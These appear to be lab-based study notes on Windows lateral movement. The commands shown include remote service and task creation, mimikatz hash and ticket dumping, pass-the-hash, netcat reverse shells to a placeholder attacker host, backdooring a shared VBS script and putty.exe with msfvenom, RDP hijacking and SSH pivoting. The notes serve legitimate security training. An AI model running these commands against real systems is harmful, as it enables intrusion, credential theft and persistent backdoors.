Lateral Movement and Pivoting

## Moving Through the Network __What is Lateral Movement?__ Simply put, lateral movement is the group of techniques used by attackers to move around a network. Once an attacker has gained access to the first machine of a network, moving is essential for many reasons, including the following: - Reaching our goals as attackers - Bypassing network restrictions in place - Establishing additional points of entry to the network - Creating confusion and avoid detection. ![image](https://hackmd.io/_uploads/SkiSQoWQ1l.png) ![image](https://hackmd.io/_uploads/rk_KIj-Xkx.png) ## Spawning Processes Remotely ### Psexec - Ports: 445/TCP (SMB) - Required Group Memberships: Administrators Psexec has been the go-to method when needing to execute processes remotely for years. It allows an administrator user to run commands remotely on any PC where he has access. The way psexec works is as follows: - Connect to Admin$ share and upload a service binary. Psexec uses psexesvc.exe as the name. - Connect to the service control manager to create and run a service named PSEXESVC and associate the service binary with C:\Windows\psexesvc.exe. - Create some named pipes to handle stdin/stdout/stderr. ![image](https://hackmd.io/_uploads/rkSxTibXyl.png) ``` psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe ``` ### Remote Process Creation Using WinRM - Ports: 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS) - Required Group Memberships: Remote Management Users Windows Remote Management (WinRM) is a web-based protocol used to send Powershell commands to Windows hosts remotely. Most Windows Server installations will have WinRM enabled by default, making it an attractive attack vector. To connect to a remote Powershell session from the command line, we can use the following command: ``` winrs.exe -u:Administrator -p:Mypass123 -r:target cmd ``` We can achieve the same from Powershell, but to pass different credentials, we will need to create a PSCredential object: ``` $username = 'Administrator'; $password = 'Mypass123'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; ``` Once we have our PSCredential object, we can create an interactive session using the Enter-PSSession cmdlet: ``` Enter-PSSession -Computername TARGET -Credential $credential ``` Powershell also includes the Invoke-Command cmdlet, which runs ScriptBlocks remotely via WinRM. Credentials must be passed through a PSCredential object as well: ``` Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami} ``` ### Remotely Creating Services Using sc __Ports__: - 135/TCP, 49152-65535/TCP (DCE/RPC) - 445/TCP (RPC over SMB Named Pipes) - 139/TCP (RPC over SMB Named Pipes) __Required Group Memberships__: Administrators ![image](https://hackmd.io/_uploads/S1W4b2Z7Jl.png) We can create and start a service named "THMservice" using the following commands: ``` sc.exe \\TARGET create THMservice binPath= "net user munra Pass123 /add" start= auto sc.exe \\TARGET start THMservice ``` To stop and delete the service, we can then execute the following commands: ``` sc.exe \\TARGET stop THMservice sc.exe \\TARGET delete THMservice ``` ### Creating Scheduled Tasks Remotely Another Windows feature we can use is Scheduled Tasks. You can create and run one remotely with schtasks, available in any Windows installation. To create a task named THMtask1, we can use the following commands: ``` schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00 schtasks /s TARGET /run /TN "THMtask1" ``` Delete task: ``` schtasks /S TARGET /TN "THMtask1" /DELETE /F ``` ## Moving Laterally Using WMI WMI is Windows implementation of Web-Based Enterprise Management (WBEM), an enterprise standard for accessing management information across devices. Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems. It is used to automate administrative tasks on remote computers and supply management data to other parts of the operating system and products. In simpler terms, WMI allows administrators to perform standard management tasks that attackers can abuse to perform lateral movement in various ways, which we'll discuss. ### Connecting to WMI From Powershell Before being able to connect to WMI using Powershell commands, we need to create a PSCredential object with our user and password. ```powershell $username = 'Administrator'; $password = 'Mypass123'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; ``` We then proceed to establish a WMI session using either of the following protocols: - DCOM: RPC over IP will be used for connecting to WMI. This protocol uses port 135/TCP and ports 49152-65535/TCP, just as explained when using sc.exe. - Wsman: WinRM will be used for connecting to WMI. This protocol uses ports 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS). To establish a WMI session from Powershell, we can use the following commands and store the session on the $Session variable, which we will use throughout the room on the different techniques: ```powershell $Opt = New-CimSessionOption -Protocol DCOM $Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop ``` The New-CimSessionOption cmdlet is used to configure the connection options for the WMI session, including the connection protocol. The options and credentials are then passed to the New-CimSession cmdlet to establish a session against a remote host. ### Remote Process Creation Using WMI __Ports:__ - 135/TCP, 49152-65535/TCP (DCERPC) - 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS) __Required Group Memberships:__ Administrators We can remotely spawn a process from Powershell by leveraging Windows Management Instrumentation (WMI), sending a WMI request to the Win32_Process class to spawn the process under the session we created before: ```powershell $Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere"; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $Command } ``` Notice that WMI won't allow you to see the output of any command but will indeed create the required process silently. On legacy systems, the same can be done using wmic from the command prompt: ```cmd wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe" ``` ### Creating Services Remotely with WMI __Ports:__ - 135/TCP, 49152-65535/TCP (DCERPC) - 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS) __Required Group Memberships:__ Administrators We can create services with WMI through Powershell. To create a service called THMService2, we can use the following command: ```powershell Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{ Name = "THMService2"; DisplayName = "THMService2"; PathName = "net user munra2 Pass123 /add"; # Your payload ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process StartMode = "Manual" } ``` And then, we can get a handle on the service and start it with the following commands: ```powershell $Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'" Invoke-CimMethod -InputObject $Service -MethodName StartService ``` Finally, we can stop and delete the service with the following commands: ```powershell! Invoke-CimMethod -InputObject $Service -MethodName StopService Invoke-CimMethod -InputObject $Service -MethodName Delete ``` ### Creating Scheduled Tasks Remotely with WMI __Ports:__ - 135/TCP, 49152-65535/TCP (DCERPC) - 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS) __Required Group Memberships:__ Administrators We can create and execute scheduled tasks by using some cmdlets available in Windows default installations: ```powershell # Payload must be split in Command and Args $Command = "cmd.exe" $Args = "/c net user munra22 aSdf1234 /add" $Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2" Start-ScheduledTask -CimSession $Session -TaskName "THMtask2" To delete the scheduled task after it has been used, we can use the following command: Unregister-ScheduledTask -CimSession $Session -TaskName "THMtask2" ``` ### Installing MSI packages through WMI __Ports:__ - 135/TCP, 49152-65535/TCP (DCERPC) - 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS) __Required Group Memberships:__ Administrators MSI is a file format used for installers. If we can copy an MSI package to the target system, we can then use WMI to attempt to install it for us. The file can be copied in any way available to the attacker. Once the MSI file is in the target system, we can attempt to install it by invoking the Win32_Product class through WMI ```powershell Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false} ``` We can achieve the same by us using wmic in legacy systems: ``` wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi ``` ## Use of Alternate Authentication Material ### NTLM Authentication ![image](https://hackmd.io/_uploads/ByKS2MX71e.png) 1. The client sends an authentication request to the server they want to access. 2. The server generates a random number and sends it as a challenge to the client. 3. The client combines his NTLM password hash with the challenge (and other known data) to generate a response to the challenge and sends it back to the server for verification. 4. The server forwards both the challenge and the response to the Domain Controller for verification. 5. The domain controller uses the challenge to recalculate the response and compares it to the initial response sent by the client. If they both match, the client is authenticated; otherwise, access is denied. The authentication result is sent back to the server. 6. The server forwards the authentication result to the client. **Note**: The described process applies when using a domain account. If a local account is used, the server can verify the response to the challenge itself without requiring interaction with the domain controller since it has the password hash stored locally on its SAM. ### Pass-the-Hash __Extracting NTLM hashes from local SAM:__ This method will only allow you to get hashes from local users on the machine. No domain user's hashes will be available. ``` mimikatz # privilege::debug mimikatz # token::elevate mimikatz # lsadump::sam RID : 000001f4 (500) User : Administrator Hash NTLM: 145e02c50333951f71d13c245d352b50 ``` __Extracting NTLM hashes from LSASS memory:__ This method will let you extract any NTLM hashes for local users and any domain user that has recently logged onto the machine. ``` mimikatz # privilege::debug mimikatz # token::elevate mimikatz # sekurlsa::msv Authentication Id : 0 ; 308124 (00000000:0004b39c) Session : RemoteInteractive from 2 User Name : bob.jenkins Domain : ZA Logon Server : THMDC Logon Time : 2022/04/22 09:55:02 SID : S-1-5-21-3330634377-1326264276-632209373-4605 msv : [00000003] Primary * Username : bob.jenkins * Domain : ZA * NTLM : 6b4a57f67805a663c818106dc0648484 ``` We can then use the extracted hashes to perform a PtH attack by using mimikatz to inject an access token for the victim user on a reverse shell (or any other command you like) as follows: ``` mimikatz # token::revert mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555" ``` Notice we used token::revert to reestablish our original token privileges, as trying to pass-the-hash with an elevated token won't work. This would be the equivalent of using runas /netonly but with a hash instead of a password and will spawn a new reverse shell from where we can launch any command as the victim user. __Passing the Hash Using Linux__ Connect to RDP using PtH: ``` xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH ``` Connect via psexec using PtH: ``` psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP ``` __Note__: Only the linux version of psexec support PtH. Connect to WinRM using PtH: ``` evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH ``` ### Kerberos Authentication __Pass-the-Ticket__ Sometimes it will be possible to extract Kerberos tickets and session keys from LSASS memory using mimikatz. The process usually requires us to have SYSTEM privileges on the attacked machine and can be done as follows: ``` mimikatz # privilege::debug mimikatz # sekurlsa::tickets /export ``` Notice that if we only had access to a ticket but not its corresponding session key, we wouldn't be able to use that ticket; therefore, both are necessary. While mimikatz can extract any TGT or TGS available from the memory of the LSASS process, most of the time, we'll be interested in TGTs as they can be used to request access to any services the user is allowed to access. At the same time, TGSs are only good for a specific service. Extracting TGTs will require us to have administrator's credentials, and extracting TGSs can be done with a low-privileged account (only the ones assigned to that account). Once we have extracted the desired ticket, we can inject the tickets into the current session with the following command: ``` mimikatz # kerberos::ptt [0;427fcd5]-2-0-40e10000-Administrator@krbtgt-ZA.TRYHACKME.COM.kirbi ``` Injecting tickets in our own session doesn't require administrator privileges. After this, the tickets will be available for any tools we use for lateral movement. To check if the tickets were correctly injected, you can use the klist command: ``` za\bob.jenkins@THMJMP2 C:\> klist Current LogonId is 0:0x1e43562 Cached Tickets: (1) #0> Client: Administrator @ ZA.TRYHACKME.COM Server: krbtgt/ZA.TRYHACKME.COM @ ZA.TRYHACKME.COM KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 4/12/2022 0:28:35 (local) End Time: 4/12/2022 10:28:35 (local) Renew Time: 4/23/2022 0:28:35 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: THMDC.za.tryhackme.com ``` ### Overpass-the-hash / Pass-the-Key ## Abusing User Behaviour ### Abusing Writable Shares It is quite common to find network shares that legitimate users use to perform day-to-day tasks when checking corporate environments. If those shares are writable for some reason, an attacker can plant specific files to force users into executing any arbitrary payload and gain access to their machines. One common scenario consists of finding a shortcut to a script or executable file hosted on a network share. ![image](https://hackmd.io/_uploads/ry7JQNIXyg.png) Although the script or executable is hosted on a server, when a user opens the shortcut on his workstation, the executable will be copied from the server to its %temp% folder and executed on the workstation. Therefore any payload will run in the context of the final user's workstation (and logged-in user account). ### Backdooring .vbs Scripts As an example, if the shared resource is a VBS script, we can put a copy of nc64.exe on the same share and inject the following code in the shared script: ``` CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\10.10.28.6\myshare\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe <attacker_ip> 1234", 0, True ``` This will copy nc64.exe from the share to the user's workstation %tmp% directory and send a reverse shell back to the attacker whenever a user opens the shared VBS script. ### Backdooring .exe Files If the shared file is a Windows binary, say putty.exe, you can download it from the share and use msfvenom to inject a backdoor into it. The binary will still work as usual but execute an additional payload silently. To create a backdoored putty.exe, we can use the following command: ``` msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=4444 -b "\x00" -f exe -o puttyX.exe ``` ### RDP hijacking When an administrator uses Remote Desktop to connect to a machine and closes the RDP client instead of logging off, his session will remain open on the server indefinitely. If you have SYSTEM privileges on Windows Server 2016 and earlier, you can take over any existing RDP session without requiring a password. If we have administrator-level access, we can get SYSTEM by any method of our preference. For now, we will be using psexec to do so. First, let's run a cmd.exe as administrator: ![image](https://hackmd.io/_uploads/B1iVvVL71g.png) `PsExec64.exe -s cmd.exe` To list the existing sessions on a server: ``` C:\> query user USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >administrator rdp-tcp#6 2 Active . 4/1/2022 4:09 AM luke 3 Disc . 4/6/2022 6:51 AM ``` To connect to a session, we will use tscon.exe and specify the session ID we will be taking over, as well as our current SESSIONNAME. Following the previous example, to takeover luke's session if we were connected as the administrator user, we'd use the following command: `tscon 3 /dest:rdp-tcp#6` Note: Windows Server 2019 won't allow you to connect to another user's session without knowing its password. ## Port Forwarding Most of the lateral movement techniques we have presented require specific ports to be available for an attacker. In real-world networks, the administrators may have blocked some of these ports for security reasons or have implemented segmentation around the network, preventing you from reaching SMB, RDP, WinRM or RPC ports. To go around these restrictions, we can use port forwarding techniques, which consist of using any compromised host as a jump box to pivot to other hosts. It is expected that some machines will have more network permissions than others, as every role in a business will have different needs in terms of what network services are required for day-to-day work. ### SSH Tunnelling The first protocol we'll be looking at is SSH, as it already has built-in functionality to do port forwarding through a feature called SSH Tunneling. While SSH used to be a protocol associated with Linux systems, Windows now ships with the OpenSSH client by default, so you can expect to find it in many systems nowadays, independent of their operating system. SSH Tunnelling can be used in different ways to forward ports through an SSH connection, which we'll use depending on the situation. To explain each case, let's assume a scenario where we've gained control over the PC-1 machine (it doesn't need to be administrator access) and would like to use it as a pivot to access a port on another machine to which we can't directly connect. We will start a tunnel from the PC-1 machine, acting as an SSH client, to the Attacker's PC, which will act as an SSH server. The reason to do so is that you'll often find an SSH client on Windows machines, but no SSH server will be available most of the time. ![image](https://hackmd.io/_uploads/SkP913uXJe.png) Since we'll be making a connection back to our attacker's machine, we'll want to create a user in it without access to any console for tunnelling and set a password to use for creating the tunnels: ``` useradd tunneluser -m -d /home/tunneluser -s /bin/true passwd tunneluser ``` Depending on your needs, the SSH tunnel can be used to do either local or remote port forwarding. Let's take a look at each case. ### SSH Remote Port Forwarding In our example, let's assume that firewall policies block the attacker's machine from directly accessing port 3389 on the server. If the attacker has previously compromised PC-1 and, in turn, PC-1 has access to port 3389 of the server, it can be used to pivot to port 3389 using remote port forwarding from PC-1. Remote port forwarding allows you to take a reachable port from the SSH client (in this case, PC-1) and project it into a remote SSH server (the attacker's machine). As a result, a port will be opened in the attacker's machine that can be used to connect back to port 3389 in the server through the SSH tunnel. PC-1 will, in turn, proxy the connection so that the server will see all the traffic as if it was coming from PC-1: ![image](https://hackmd.io/_uploads/BkD7vhd71l.png) A valid question that might pop up by this point is why we need port forwarding if we have compromised PC-1 and can run an RDP session directly from there. The answer is simple: in a situation where we only have console access to PC-1, we won't be able to use any RDP client as we don't have a GUI. By making the port available to your attacker's machine, you can use a Linux RDP client to connect. Similar situations arise when you want to run an exploit against a port that can't be reached directly, as your exploit may require a specific scripting language that may not always be available at machines you compromise along the way. Referring to the previous image, to forward port 3389 on the server back to our attacker's machine, we can use the following command on PC-1: ``` C:\> ssh tunneluser@1.1.1.1 -R 3389:3.3.3.3:3389 -N ``` This will establish an SSH session from PC-1 to 1.1.1.1 (Attacker PC) using the tunneluser user. Since the tunneluser isn't allowed to run a shell on the Attacker PC, we need to run the ssh command with the -N switch to prevent the client from requesting one, or the connection will exit immediately. The -R switch is used to request a remote port forward, and the syntax requires us first to indicate the port we will be opening at the SSH server (3389), followed by a colon and then the IP and port of the socket we'll be forwarding (3.3.3.3:3389). Notice that the port numbers don't need to match, although they do in this example. The command itself won't output anything, but the tunnel will depend on the command to be running. Whenever we want, we can close the tunnel by pressing CTRL+C as with any other command. Once our tunnel is set and running, we can go to the attacker's machine and RDP into the forwarded port to reach the server: